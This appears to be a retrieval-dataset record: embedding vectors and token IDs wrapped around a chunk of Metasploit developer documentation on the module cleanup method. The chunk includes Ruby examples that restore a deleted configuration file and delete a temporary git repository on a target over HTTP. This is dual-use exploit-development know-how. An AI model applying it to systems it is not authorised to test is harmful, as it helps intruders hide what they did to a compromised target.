-0.7865667939186096, -0.17672953009605408, -0.6026337146759033, -0.2348538488149643, 0.36008521914482117, 0.2833547294139862, -0.22942864894866943, -0.5896285176277161, -0.8510289192199707, -0.007350292056798935, -0.5551949143409729, -1.1303600072860718, 0.24624554812908173, 0.009129510261118412, -0.544560968875885, -0.3903617560863495, -1.0769519805908203, -0.11235211789608002, 0.5071781873703003, -0.5722314715385437, 0.08567433059215546, 0.5575261116027832, 0.254934698343277, 0.405341237783432, -0.4284375011920929, -0.0017612628871574998, -0.5150874853134155, -0.21980684995651245, 0.12251663953065872, -0.7626217007637024, -0.7319520115852356, 0.0935172438621521, 0.47524353861808777, -0.1703224778175354, 0.3295663595199585, -0.09268447756767273, -0.2265414297580719, -0.7571390867233276, -0.13518373668193817, -0.14861832559108734, -0.3078640401363373, -0.6531254053115845, 0.319784015417099, 0.022319726645946503, -0.22166863083839417, 0.3940304219722748, -1.1776388883590698, -0.7659459114074707, 0.24239809811115265, 0.22003613412380219, 0.7374712228775024, 0.6400790810585022, -0.18609507381916046, 0.21167761087417603, 0.135035902261734, 0.11659356951713562, 0.19033893942832947, 0.003309966530650854, -0.3840363323688507, -0.011825475841760635, 0.018114492297172546, -0.9068425893783569, 0.15103721618652344, 0.26323986053466797, 0.15971675515174866, 0.3485565781593323, 0.19645653665065765, -0.03371443226933479, -0.09117305278778076, 0.2463277280330658, 0.002094392664730549, 0.932679295539856, 0.7729365229606628, -0.019210832193493843, 0.3060572147369385, 0.2202991098165512, -1.0040091276168823, -0.14924167096614838, -1.7568660974502563, -0.23661008477210999, 0.11025410890579224, -0.09049269556999207, -0.026090992614626884, -0.05045608803629875, -0.005862616002559662, 0.1645348072052002, 0.23667427897453308, -0.5427416563034058, 0.3427787721157074, 0.47710809111595154, 0.48028403520584106, 1.0025638341903687, -0.4939034879207611, -0.18385617434978485, -0.13227933645248413, 0.7944753766059875, -0.6249927282333374, -1.157248854637146, 0.2665843069553375, 0.6681202054023743, 0.15724527835845947, 0.7528921961784363, -0.43008363246917725, 0.21364639699459076, 0.24599657952785492, 0.053115665912628174, 0.062060628086328506, -0.0094589963555336, -0.5845686793327332, 0.590858519077301, -0.030047204345464706, 0.27012261748313904, -0.20583868026733398, 0.28764238953590393, -0.7332038879394531, -0.053883396089076996, -0.9666869640350342, -0.2917429804801941, 0.3781203627586365, -0.8863269090652466, 0.8762548565864563, 0.799963653087616, 0.4847765266895294, -0.9887841939926147, 0.10396145284175873, 0.16086964309215546, 0.5642470121383667, 0.9928407669067383, 0.553117573261261, 0.4688808023929596, 0.5944436192512512, 0.31769511103630066, -0.4608185291290283, -0.13648076355457306, 0.6971375346183777, -0.48931416869163513, -1.1587200164794922, 0.9938780069351196, 0.3350260257720947, -0.1026458889245987, -0.19208495318889618, 0.2265375256538391, 0.23611712455749512, -0.47477951645851135, 0.461153119802475, -0.43590280413627625, -0.257005900144577, 0.6488727331161499, -0.7821012139320374, 0.32550719380378723, 0.5300190448760986, -0.6560699939727783, 0.8529632091522217, 0.21202582120895386, -0.5756372809410095, -0.26496776938438416, 0.9788891077041626, 0.2601335048675537, -0.08191556483507156, 0.32681310176849365, -0.16691453754901886, 0.20682837069034576, 0.015983939170837402, 0.7303765416145325, -0.1655937135219574, 0.6173314452171326, -0.3752119839191437, -0.5200432538986206, -0.5905485153198242, -0.17817792296409607, -0.22988572716712952, 0.1671513319015503, -0.5137415528297424, -0.4642391800880432, 0.33165907859802246, -0.46004000306129456, 0.5238818526268005, -0.7171255350112915, -0.5738324522972107, 0.9148394465446472, -0.25530141592025757, 0.5595495104789734, 0.8943105340003967, -0.07748347520828247, 0.17201074957847595, 0.02453739009797573, 0.8437561392784119, 0.7045258283615112, 0.7827053070068359, 0.9796864986419678, -0.40215831995010376, 0.07778818905353546, 0.20786277949810028, -0.9768911004066467, 0.25770139694213867, -0.3705883324146271, 0.26854801177978516, 0.03977770730853081, -0.8693230152130127, -0.00006993704300839454, -0.16293801367282867, 0.01719650812447071, 0.42670243978500366, -0.5808004140853882, 0.07751945406198502, 0.36021050810813904, -0.5718964338302612, -0.05267386510968208, 1.57168447971344, 0.46347665786743164, 0.4441072344779968, -0.9855034351348877, 0.2508983612060547, -1.0521423816680908, 0.1369590163230896, -0.8170595169067383, 0.04314007982611656, -0.10790184885263443, -0.7754623293876648, -0.25114721059799194, -0.8732180595397949, 0.3540363013744354, -0.17748118937015533, -0.8202513456344604, -0.47113534808158875, 0.7477282881736755, 0.4616285562515259, 0.4818851947784424, 0.7482149600982666, -0.2362830936908722, 0.0834653303027153, 0.4108421504497528, 0.6497784852981567, -0.937493622303009, 0.2990725040435791, 0.3303452134132385, 0.13110654056072235, 0.22129619121551514, 0.23853819072246552, 0.3394552171230316, -0.11479591578245163, -0.08962320536375046, 0.21820099651813507, -0.1711890697479248, -0.6117991805076599, -0.2420242726802826, 0.2526831328868866, -0.3647094964981079, 0.6984434127807617, -0.784662127494812, -0.4628262221813202, -1.0605241060256958, -1.1874337196350098, -0.12509874999523163, -0.13222350180149078, 0.31355541944503784, -0.7168834805488586, -0.3388230502605438, 0.06945306062698364, -1.0361961126327515, 3.9211294651031494, 0.7650466561317444, 0.3346308171749115, 0.17973992228507996, 0.050033796578645706, 1.0879141092300415, 0.7461348176002502, -0.14410316944122314, 0.18354877829551697, -0.6536450386047363, 0.2583211660385132, 0.46995705366134644, 1.110129952430725, -0.1978415548801422, 0.4138492941856384, 0.19059742987155914, 0.0037636104971170425, -0.20089957118034363, 0.2680494487285614, -0.9578445553779602, -1.0211423635482788, 0.00007206090958788991, -0.13189677894115448, 1.050103783607483, 0.015670258551836014, 0.7499330043792725, 0.0758056715130806, -1.015333652496338, -0.4288661777973175, -0.8042216897010803, 0.5822595357894897, -0.614019513130188, 0.8234753012657166, -0.1048755943775177, -0.0845833569765091, 0.3956643044948578, 0.17661574482917786, -0.43069884181022644, -0.27092817425727844, -0.30869075655937195, 0.7301903963088989, -0.08593518286943436, -0.6980195641517639, -0.4389161765575409, -0.46692678332328796, 0.39279302954673767, 0.36708834767341614, 0.36691007018089294, 1.0344727039337158, -0.3814345598220825, 0.006051454693078995, 0.07630816847085953, 0.2015799880027771, 0.21161286532878876, -0.7221402525901794, -0.2996422350406647, 0.048124659806489944, -0.49567922949790955, 0.4683322310447693, 0.15348023176193237, -0.1560153365135193, 0.5441023707389832, -0.042116954922676086, -0.12541386485099792, 0.25631430745124817, 0.6197519302368164, 0.24763071537017822, 0.16562899947166443, -1.0028867721557617, 0.08515483140945435, 0.808996856212616, -0.3464903235435486, -0.37248706817626953, -0.5144272446632385, -0.15892581641674042, 0.18303894996643066, 0.14921653270721436, 0.3330078721046448, 0.6353621482849121, -0.4301121234893799, -0.13099288940429688, -0.09883232414722443, -0.8464677333831787, -0.5427387356758118, -0.4704495966434479, 0.4172460734844208, -0.8322810530662537, -0.27426135540008545, -0.1096908450126648, 0.35477688908576965, 0.3621198832988739, 0.41144973039627075, -0.7570335268974304, 0.2412233203649521, 0.24511827528476715 ]
[ 2119, 2097, 2022, 2699, 2039, 2000, 1996, 4098, 22967, 8583, 4842, 20330, 5787, 1012, 2065, 2275, 2000, 5717, 2030, 1037, 2512, 1011, 2193, 1010, 2023, 5724, 2097, 2025, 2022, 2109, 1012, 4431, 11039, 25856, 2015, 1024, 1013, 1013, 21025, 2705, 12083, 1012, 4012, 1013, 5915, 2581, 1013, 18804, 13102, 4135, 4183, 1011, 7705, 1013, 1038, 4135, 2497, 1013, 3040, 1013, 5622, 2497, 1013, 5796, 2546, 1013, 4563, 1013, 9830, 1013, 8740, 2705, 1035, 26128, 1012, 21144, 102 ]
metasploit
124.txt
1
[CLS] on this pagecleanup methodfiledropper mixin cleanup methodmetasploit has a handy cleanup method that is always called when the module terminates, whether it is successful or not. this method can be overridden by any modules to add their own cleanup routines. for example, this might be useful to put some files back on the target after the module had deleted them. another scenario would be to restore the settings in a web application that were modified by the exploit. this is the right place to clean things up. framework itself implements this method to disconnect connections, call the handler cleanup routines, etc. some other mixins, such as the msf : : exploit : : filedropper ( see the next section ) or msf : : exploit : : remote : : kerberos : : client, override this method to add their own cleanup code. it is extremely important to always call super in your cleanup method to make sure framework and any other mixins clean up themself properly. here is an example that restores a configuration file after being deleted by the module : def cleanup unless self. conf _ content. nil? write _ file ( self. conf _ file, self. conf _ content ) end super end here is another example of a cleanup method that deletes a temporary git repository : def cleanup super return unless need _ cleanup? print _ status ('cleaning up') uri = normalize _ uri ( datastore ['username'], self. repo _ name,'/ settings') csrf = get _ csrf ( uri ) res = send _ request _ cgi ( {'method'= >'post ','uri'= > normalize _ uri ( datastore ['targeturi'], uri ),'ctype'= >'application / x - www - form - urlencoded ','vars _ post'= > { _ csrf : csrf, action :'delete ', repo _ name : self. repo _ name } } ) unless res fail _ with ( failure : : unreachable,'unable to reach the settings page') end unless res. code = = 302 fail _ with ( failure : : unexpectedreply,'delete repository failure') end print _ status ( " repository # { self. repo _ name } deleted. " ) nil
[ -0.31963464617729187, -0.180772066116333, -0.28416335582733154, 1.4077502489089966, -0.2498869001865387, 0.019638383761048317, -0.4562607705593109, -0.04257655888795853, 0.38858726620674133, 0.7171834707260132, 0.5358868837356567, -0.03816118463873863, 0.1460651010274887, -0.39999598264694214, -0.9094228744506836, -0.2634934186935425, -0.4128992557525635, -1.0603708028793335, -1.3698482513427734, 0.18079493939876556, 0.6195296049118042, -0.1471482813358307, -0.02425544150173664, -1.3915178775787354, 0.14630000293254852, 1.3300304412841797, 0.16993527114391327, -0.8847236037254333, 0.7229788303375244, 0.5390177965164185, -0.0995127409696579, -0.34366148710250854, 0.13557285070419312, -0.03594980016350746, 0.07647756487131119, -0.17518319189548492, 0.7412583231925964, -0.05419424921274185, -0.08731889724731445, -0.506539523601532, 0.2688165605068207, -0.582595705986023, 0.04738182947039604, -0.5775473713874817, -0.08495014160871506, -0.16069716215133667, -0.05322250723838806, 0.0304059237241745, 0.1614704579114914, -0.35727035999298096, -0.023153645917773247, 0.42958906292915344, -0.01940242573618889, 0.3242294192314148, -0.09996434301137924, -0.32326602935791016, 0.0562349371612072, 0.5491719245910645, -0.3915064334869385, 0.45714712142944336, 0.3615041673183441, 0.2176303267478943, -0.15921947360038757, -0.9184292554855347, 0.21828696131706238, 0.7890002727508545, -0.7092158794403076, -0.20464082062244415, -0.166526660323143, -0.41424205899238586, -0.03682301193475723, 0.7553402781486511, -0.7738532423973083, -0.5098237991333008, -0.743815541267395, -0.20242783427238464, -0.37950399518013, -0.6214529275894165, -0.07393230497837067, 1.046064853668213, 0.01539398729801178, 1.0633193254470825, 0.5092113018035889, -0.08105753362178802, -0.1694171130657196, -0.6067113280296326, 0.6524959206581116, 0.8421034812927246, -0.3311924934387207, 0.08648945391178131, 0.108415387570858, 0.7708502411842346, -0.5817227363586426, -0.05316914990544319, 0.014181477017700672, 0.40720173716545105, -0.5291087627410889, 0.2886395752429962, -0.3103824257850647, -0.0767378956079483, 1.2340991497039795, 0.6965324282646179, -0.0734640583395958, -0.005697667133063078, -0.35557112097740173, 0.5210712552070618, 0.5255513191223145, -0.16598844528198242, -0.7100399732589722, -0.8611242771148682, 0.8456861972808838, -0.14804388582706451, 0.12648142874240875, -0.5300855040550232, -0.157770037651062, -0.10264137387275696, 0.06354270875453949, 0.21510489284992218, -0.019623558968305588, 0.5066616535186768, 0.07350458204746246, -0.5004008412361145, 0.367109090089798, -0.6373138427734375, 0.04220152273774147, -0.2392919510602951, 0.6175339818000793, 0.2944501042366028, -0.24528515338897705, -0.38206833600997925, -0.5004332065582275, -0.21219691634178162, 0.027956752106547356, 0.6909743547439575, -0.42621296644210815, 0.800243079662323, 0.2992287576198578, 0.7658129930496216, 0.648705005645752, -0.8603018522262573, 0.08735460788011551, 0.37728986144065857, -0.5479928851127625, 0.8488301038742065, 0.4864789545536041, -0.09978586435317993, -0.319088876247406, -0.21686460077762604, -0.003156538587063551, 0.40437307953834534, -0.6311318874359131, 0.026968445628881454, 0.4401412308216095, -0.6728184819221497, -0.711819589138031, -0.34318140149116516, -1.21180260181427, 0.5148755311965942, 0.16934189200401306, 0.4297216534614563, 0.06633510440587997, 0.5740245580673218, 0.048128169029951096, 0.5060368776321411, -0.88942950963974, -0.05166880041360855, -0.644662082195282, -0.13054771721363068, 0.23530429601669312, 0.21763890981674194, 0.41165807843208313, 0.32010418176651, 0.0023240530863404274, 0.5976160764694214, 1.1878187656402588, 0.769732654094696, -0.4542098343372345, -0.5202875137329102, 0.2792133092880249, 1.0106587409973145, -0.04392292723059654, 1.0593781471252441, -0.23138029873371124, 1.0088690519332886, 0.3304378092288971, -0.24813899397850037, 0.10497628152370453, -0.759808361530304, -0.2502504289150238, -0.012087569572031498, 0.45520395040512085, 0.3030375838279724, -0.8327895402908325, -0.03299829363822937, 0.30361440777778625, -0.49504604935646057, -0.9831588864326477, -0.062435273081064224, 0.4707869291305542, -1.4675633907318115, -0.43652239441871643, 0.5499100089073181, -0.531966507434845, 0.12425163388252258, -0.3935529291629791, -0.4009714722633362, 1.8091027736663818, 0.11294303089380264, -0.6459682583808899, 1.0500911474227905, 0.7214521765708923, -0.36882543563842773, -0.8751591444015503, -0.6800746917724609, -0.23539483547210693, -0.4101317524909973, 0.004679443780332804, 0.9098952412605286, 0.47986769676208496, 0.2323843091726303, 0.1209479346871376, 0.321696937084198, -0.039339493960142136, 0.49515342712402344, -0.2899892032146454, -0.218667134642601, -0.17244847118854523, 0.6651319861412048, 0.049537088721990585, 0.13846157491207123, -0.26957544684410095, 0.3836662769317627, 0.2529822587966919, 1.0601332187652588, -0.11625376343727112, -0.5361092686653137, 0.2540614902973175, 0.3855360746383667, -0.36220598220825195, -0.39566975831985474, -0.11604244261980057, 1.5777677297592163, 0.3634055256843567, 0.6254212856292725, 0.06227792799472809, 0.5663200616836548, 0.16814421117305756, 0.16938497126102448, -0.4768678843975067, 0.22325484454631805, -0.5530611872673035, 0.9021803736686707, 0.6438591480255127, 0.04948955401778221, -0.4899405837059021, -0.16837148368358612, 0.3989814519882202, 0.7454620003700256, -0.8293083906173706, -0.42043301463127136, 0.29323357343673706, 0.09854111075401306, -0.5304153561592102, -1.1546623706817627, -0.10628066956996918, 0.6180726885795593, -0.29746243357658386, -0.15522703528404236, -0.13609987497329712, -0.2944507598876953, -0.609910249710083, -0.16412325203418732, -1.1950842142105103, -0.39069703221321106, -0.6654907464981079, -0.0461471751332283, 0.35033443570137024, 0.05427185446023941, 0.6075827479362488, -0.029584789648652077, -0.687489926815033, -0.02901216596364975, 0.07279688119888306, 0.8593831062316895, 0.4965461492538452, 0.7158219218254089, -1.2405915260314941, -0.2721218466758728, 0.08770235627889633, 0.2953750789165497, -0.46021193265914917, -0.32875457406044006, 0.01217862032353878, -0.3225040137767792, 0.21511664986610413, 0.16509248316287994, 1.315335750579834, -0.6132630705833435, 0.07228534668684006, -0.10713685303926468, 0.3179970383644104, -0.47646987438201904, 0.44563159346580505, 0.5348325967788696, -0.6539809703826904, 0.6874349117279053, 0.3704257011413574, 0.017013097181916237, 0.7381280660629272, 0.7090787291526794, -0.6140921115875244, 0.1307910680770874, -0.2579742670059204, 1.1395078897476196, -0.6248977184295654, 0.7501063942909241, 0.6026114821434021, -0.10824761539697647, -0.06855209916830063, 0.06861889362335205, -0.31805846095085144, -0.29436397552490234, -0.46182361245155334, -0.15435361862182617, -0.5213505625724792, 0.45041370391845703, 0.1613382250070572, -0.9802132844924927, 0.32439741492271423, -0.29229679703712463, 0.15149259567260742, -0.052616462111473083, -0.4977111220359802, 0.6507648825645447, 0.36555051803588867, 0.042383939027786255, -0.464994877576828, -0.007765607908368111, 0.15344566106796265, 0.4545668661594391, 0.22327448427677155, -1.061635136604309, 0.3321332633495331, 0.07947837561368942, 0.05662594363093376, 0.11098520457744598, 0.6944862008094788, -0.24578158557415009, -0.5686712861061096, -0.24187332391738892, -0.7251361608505249, 0.49785295128822327, 0.2847693860530853, 0.38523826003074646, -0.030478214845061302, 0.8989798426628113, -0.5640417337417603, 0.5708590745925903, 0.4894741475582123, 0.8446028828620911, 0.9812721610069275, -0.6082918643951416, 0.06333766877651215, -0.17553682625293732, -0.8146171569824219, -0.23322327435016632, -0.1176091730594635, 0.563219428062439, 0.5849184393882751, -0.17416466772556305, 0.23658420145511627, -0.28452202677726746, -0.5218150615692139, 0.8724749684333801, -0.36637672781944275, -0.6274054646492004, 0.658332347869873, -0.13584180176258087, 0.47264331579208374, 0.10458271205425262, -0.09913404285907745, 0.06022854521870613, 1.0060851573944092, 0.3179204761981964, -0.623731255531311, -0.6616554856300354, -0.6017341613769531, -0.22130422294139862, -0.6431738138198853, -0.02661052532494068, 0.41126832365989685, 0.29970720410346985, 0.37499138712882996, -0.21896889805793762, -0.4891350269317627, -0.44586634635925293, 0.7373721599578857, 1.6718069314956665, 0.8811390995979309, 0.5637397170066833, 0.9769253730773926, 0.8959259986877441, -0.31663811206817627, 0.6375150084495544, -0.709502637386322, 0.6854910254478455, -0.9131401181221008, 0.7181020975112915, 0.1258142590522766, 0.038725413382053375, -0.3321032226085663, -0.02187327854335308, -0.26803821325302124, 0.010005461983382702, 0.12984178960323334, -0.5536066293716431, -0.8817827105522156, 0.03323190659284592, 0.681953489780426, 0.03057268261909485, -0.368684858083725, 0.05401280149817467, -0.058850355446338654, 0.4048609435558319, 0.9670102000236511, -0.8585610389709473, -0.08712752163410187, -0.8693017363548279, -0.1962464600801468, 0.6110436916351318, 0.06298157572746277, -0.4966771900653839, -0.4794287085533142, -0.20297685265541077, -1.3598663806915283, 0.6930509209632874, 0.8753321766853333, -0.13927432894706726, -0.04675114527344704, -0.3597772717475891, -0.3381727933883667, 0.21919888257980347, -0.6202260255813599, -1.1888737678527832, -0.17659230530261993, 0.48858505487442017, -0.10289809852838516, 0.34540870785713196, -0.7155172824859619, -0.3939721882343292, 0.0013103076489642262, -1.0087007284164429, 0.11318521946668625, -0.5565164089202881, -0.08346005529165268, -0.3114534318447113, 0.34803515672683716, 0.06957922875881195, 0.41424083709716797, -0.2828221917152405, -0.20191103219985962, -0.705555260181427, 0.23616360127925873, -0.7110602259635925, -0.3668300211429596, 0.3977842628955841, -0.2472602277994156, 0.3151227831840515, 0.337267130613327, 0.5905832648277283, -0.460074782371521, 0.30351680517196655, 0.7330513596534729, -0.3214963674545288, 0.5876857042312622, -0.9749453663825989, 0.6406307220458984, 0.8410000205039978, -0.337595671415329, 0.368913471698761, -0.40836870670318604, 1.4013290405273438, 0.4397571384906769, 0.487577348947525, -1.0919219255447388, -0.761202335357666, 0.343070924282074, 0.4454370141029358, -0.15573430061340332, 0.7933961749076843, -0.3587277829647064, -0.3046070635318756, -0.06594821810722351, 0.013953622430562973, -0.9626785516738892, -0.6000440120697021, 0.1699211597442627, -0.0399046465754509, 0.6356304287910461, 0.2527383863925934, 0.27191388607025146, -0.07059555500745773, -0.6939576864242554, 0.3430396318435669, -0.7472307682037354, -0.2638709247112274, -0.41838324069976807, -0.020653238520026207, -0.8158636093139648, 0.1712675243616104, -0.4925672709941864, 0.7009163498878479, 0.41361004114151, 0.6267489194869995, 0.5531904697418213, -0.20188802480697632, -0.07791537791490555, 0.197292298078537, -0.3848375380039215, 0.32012939453125, -0.30359190702438354, -1.1165670156478882, 0.2734089493751526, 1.0946792364120483, -0.4032302796840668, -0.02476179040968418, -0.08215686678886414, -0.2799961268901825, -1.2605929374694824, -0.9739813804626465, 0.41359078884124756, -0.09160738438367844, 0.35781416296958923, -0.8478594422340393, -0.601335883140564, -0.2724490761756897, 0.24447375535964966, 0.04232106730341911, -1.1071040630340576, -0.5993488430976868, -0.14186662435531616, -0.07724025100469589, -0.21575410664081573, -0.30481696128845215, -0.430736780166626, -0.6863682270050049, 0.34390154480934143, 1.0188060998916626, 0.557941734790802, 0.22919118404388428, 0.4186783730983734, 0.16652394831180573, 0.5382614731788635, -0.00827737245708704, -0.793148934841156, -0.6565281748771667, 0.13036519289016724, -0.1928713321685791, -0.19491226971149445, 0.5426504015922546, -0.750603199005127, 0.1743946224451065, -0.1086171492934227, 0.455869197845459, -0.7642794847488403, 0.12311709672212601, 0.4118381440639496, 0.13006746768951416, 0.5666316747665405, -0.7907571196556091, 0.5250406265258789, 0.3059254586696625, 0.922435998916626, 0.20124424993991852, 0.38643842935562134, -0.4346204698085785, 0.32117989659309387, -1.0057343244552612, -1.5434825420379639, 0.7262119054794312, -0.010137864388525486, -0.15320806205272675, -0.15263229608535767, -0.13126656413078308, 0.8059161901473999, -0.23580734431743622, 0.4056485891342163, 0.9805266261100769, 0.7517186999320984, 0.4203384816646576, -0.7593610882759094, 0.7789164185523987, 0.763908863067627, -0.05658866837620735, 0.15917712450027466, -0.2100219428539276, 0.4671655595302582, 0.04119334742426872, -0.6776558756828308, -0.24873189628124237, -0.7842700481414795, -0.2624998092651367, 0.3629012703895569, -0.42739927768707275, 0.2744912803173065, -0.9340026378631592, -0.8044172525405884, -0.4139760136604309, 0.20303058624267578, 0.7784882187843323, 0.6002097129821777, 0.1896916627883911, -0.47766199707984924, -0.3939800560474396, -0.7548975348472595, 0.3170996606349945, -0.39504799246788025, -0.44092413783073425, 0.8789173364639282, 0.37637636065483093, -0.503268301486969, 0.7384905219078064, 0.3592011332511902, -0.5578732490539551, -0.2842889726161957, -0.9671114683151245, -0.3092959225177765, -0.18666161596775055, -0.4621339440345764, -0.6058588027954102, -0.10122451931238174, 0.8943848013877869, 0.17473821341991425, 1.2789467573165894, -0.23254919052124023, -0.35192281007766724, -0.6164286136627197, 0.5894969701766968, -0.06352471560239792, -0.23325687646865845, 0.5621088743209839, -0.8320090174674988, -0.2574611306190491, -1.270384430885315, 0.004388807807117701, 0.6763378381729126, 0.015618938021361828, 0.5663192868232727, -0.08440010249614716, 0.29742369055747986, 0.3149760663509369, -0.22166983783245087, 0.9458841681480408, -0.2949630916118622, 0.9167307615280151, 0.47094419598579407, -0.44171929359436035, -0.6083073616027832, -0.47771626710891724, -0.008260106667876244, -0.6045745611190796, 0.446605920791626, -0.5420160889625549, -0.023167578503489494, -0.06615474820137024, 0.311921089887619, -0.12749284505844116, -1.2198896408081055, -0.7330780029296875, -1.2098629474639893, -0.21517761051654816, -0.37198606133461, 0.4724583923816681, 0.014775412157177925, 0.297366201877594, -0.08578794449567795, -0.18495264649391174, -0.13462604582309723, -0.1734977811574936, -0.16168184578418732, -0.2841300368309021, -0.2782094180583954, -0.12466906011104584, -0.7611135840415955, -0.9862799644470215, -0.20692774653434753, -0.283610999584198, -0.1088656634092331, -0.5039120316505432, 0.09146393835544586, -0.05989954620599747, -0.7598837018013, 0.22593457996845245, -0.7625010013580322, -0.2019975185394287, -0.010098160244524479, -0.9667231440544128, 0.0018332315376028419, 1.0636508464813232, -0.1439347118139267, 0.32205575704574585, 0.4047459661960602, 0.5081113576889038, 0.3248807489871979, -0.4325985908508301, -0.06988860666751862, 0.19789108633995056, 0.3199753761291504, 0.29456084966659546, 0.5742983222007751, -0.9603875279426575, 0.6485797762870789, -0.5318666100502014, -0.506568968296051, -0.12958300113677979, -0.7658267617225647, 0.03358347713947296, 0.2905144989490509, -0.35901394486427307, 0.23690462112426758, 0.6339956521987915, 0.20317545533180237, -0.09944482147693634, -0.30753880739212036, 0.7676946520805359, 0.4242852032184601, -0.36302539706230164, 0.08938347548246384, 0.08096820116043091, 0.3645787835121155, -0.35988107323646545, 0.13425213098526, 0.04004514962434769, 0.1760043501853943, 0.35411345958709717, -0.05195850878953934, 0.04020975902676582, -0.4836771488189697, -0.9940004348754883, -0.007802536245435476, 0.6795292496681213, 0.014795051887631416, -0.0612659752368927, 0.5572639107704163, -0.05267263576388359, -0.3331734240055084, 0.06470660120248795, -0.8897377848625183, 0.09664589911699295, 0.5310583114624023, -0.4422093629837036, -0.6217326521873474, -0.6186089515686035, 0.08920998126268387, -0.15300200879573822, -0.12637482583522797, -0.10343918204307556, 1.0804928541183472, -0.42121604084968567, 0.6386178731918335, 1.3051129579544067, -0.547274649143219, 0.07626592367887497, -0.760967493057251, 0.834994375705719, -0.8653833270072937, -0.9094468355178833, 0.2376755326986313, 0.9839309453964233, 0.34721609950065613, -0.4262845814228058, -0.31105902791023254, 0.0034590133000165224, 0.28865790367126465, 0.1739450842142105, 0.5325872898101807, -0.4883953034877777, -1.6237298250198364, 0.028812745586037636, -0.4430561661720276, 0.1309780329465866, 0.04157039150595665, -0.07022475451231003, -0.04921901598572731, -0.4043353796005249, -0.5426959991455078, 0.33480021357536316, 0.1576383262872696, -0.006310609634965658, 1.3638323545455933, 0.4917725920677185, 0.13857360184192657, -0.7237928509712219, 0.18209123611450195, -0.5675755143165588, 0.6977466940879822, -0.08950795233249664, 0.2698519229888916, 0.23314268887043, 0.20215639472007751, 0.3936697244644165, -0.6260691285133362, -0.20105735957622528, 0.5785835981369019, 0.44370004534721375, -0.09582734853029251, 0.28693628311157227, -0.3308437764644623, 0.08615276217460632, -0.3167990446090698, -0.4830237627029419, 0.4693175256252289, 0.24377478659152985, 0.4805869460105896, -0.03004659153521061, -0.21377696096897125, 0.30999302864074707, -0.884655773639679, 0.48976191878318787, 0.11435364186763763, -0.19564887881278992, 0.47880661487579346, 0.04804251343011856, -0.8465257883071899, 0.23501183092594147, 0.9903146624565125, 0.45622336864471436, -0.4147174060344696, 0.5592418909072876, 0.002349803689867258, 0.41920214891433716, -0.13252051174640656, 0.5763015747070312, -0.30800607800483704, 0.4273429214954376, 0.028806107118725777, -0.37073636054992676, -0.7229337692260742, -0.24391070008277893, 0.03791176900267601, -0.41341742873191833, -0.08792147785425186, -0.019527403637766838, 0.056319598108530045, -0.5679347515106201, 0.20218658447265625, -0.26279452443122864, -0.12112611532211304, 0.7883986830711365, -1.0114502906799316, -0.5304298400878906, 1.3818689584732056, 0.1848677396774292, 0.8599861264228821, -0.3341594636440277, 0.8006113767623901, 0.2239287942647934, 0.5721914172172546, -0.2646300196647644, -0.84241783618927, -0.31659939885139465, 0.04614321142435074, -0.4576076567173004, -0.22509624063968658, -0.14632265269756317, 0.4306586980819702, 0.2796144485473633, -0.11680500209331512, -0.09718989580869675, -1.0998510122299194, 0.2903416156768799, -0.6444200873374939, -1.0743759870529175, 0.9361602663993835, 0.217131569981575, -1.0767172574996948, 0.3015627861022949, 0.4026877284049988, 0.35430389642715454, -0.0837397351861, -0.3681183159351349, -0.04603193700313568, -1.001554250717163, -0.9171047210693359, -0.9123920798301697, 0.8019862174987793, -0.26945337653160095, -0.020782319828867912, -0.08450506627559662, -1.0107090473175049, -0.41774338483810425, -0.012485467828810215, -0.5730168223381042, -0.5562025904655457, 0.5650182962417603, 0.6746722459793091, 0.6803277730941772, 0.3638361990451813, -0.2544142007827759, -0.020978515967726707, 0.5199378132820129, 0.8314328193664551, -0.1942726969718933, 0.3990306258201599, 0.656545102596283, -0.5690575838088989, -0.43143969774246216, -0.13168980181217194, 0.7189292907714844, -0.06860131025314331, -0.08465299755334854, -0.15449970960617065, -0.23350201547145844, -0.9489448070526123, -0.6299866437911987, 0.016094915568828583, -0.029976068064570427, 0.49423453211784363, -0.4310605525970459, -0.7619358897209167, 0.0752912238240242, -0.40675580501556396, 0.35935723781585693, -0.1390630602836609, -0.1996650993824005, 0.8204136490821838, -0.326461523771286, 0.62211012840271, -1.345327615737915, 3.9550087451934814, 0.3884182572364807, 0.5172072052955627, 0.3648536503314972, 0.46815773844718933, 0.8195033073425293, 0.7552890777587891, -0.4433193802833557, 0.053977273404598236, -0.40696319937705994, 0.1398857831954956, -0.32950687408447266, 0.7116008400917053, 0.804267168045044, 0.5295588374137878, 0.7931845188140869, -0.782559335231781, 0.1529049128293991, 0.15117214620113373, -1.1295057535171509, -0.7680781483650208, -0.03681003302335739, -0.048560358583927155, 0.7463786602020264, 0.24533335864543915, 0.3950284421443939, -0.012160264886915684, -0.1487128883600235, 0.2464936226606369, 0.0033867608290165663, 0.052032846957445145, -0.8670961856842041, 0.018771357834339142, -0.22151783108711243, -0.5710951089859009, 0.5369077920913696, -0.15735574066638947, -0.799187421798706, -0.6088570952415466, -0.11633466184139252, 0.9967672824859619, 0.16592206060886383, 0.16815248131752014, -0.6377211213111877, 0.363481730222702, 0.7828055024147034, -1.0025008916854858, -0.03855380415916443, 0.901379406452179, -0.35609689354896545, 0.7362277507781982, -0.09054461866617203, 0.9202690720558167, 0.9260756373405457, -0.7821006774902344, 0.5040301084518433, 0.17781999707221985, -0.38565096259117126, 0.03729191794991493, -0.03619265556335449, 0.576772928237915, -0.24729838967323303, 0.16330383718013763, 0.22094348073005676, -0.9472022652626038, 0.20042721927165985, -0.5823925733566284, 0.3795981705188751, -0.35402223467826843, -0.581112802028656, -0.020414741709828377, -0.40572285652160645, 0.24494385719299316, -0.31388309597969055, 0.643046498298645, 0.13214389979839325, 0.41542914509773254, 0.5829049348831177, 0.08537042886018753, -0.433938205242157, 0.017573069781064987, -1.1396822929382324, -0.9117462635040283, 0.3521174192428589, 0.8938588500022888, 0.4966730773448944, 0.0543852262198925, -0.9889764189720154, -0.2542908489704132, 0.07467500865459442, 0.22117072343826294, 0.22330816090106964, 0.04649804159998894, -0.15496647357940674, 0.9319832921028137 ]
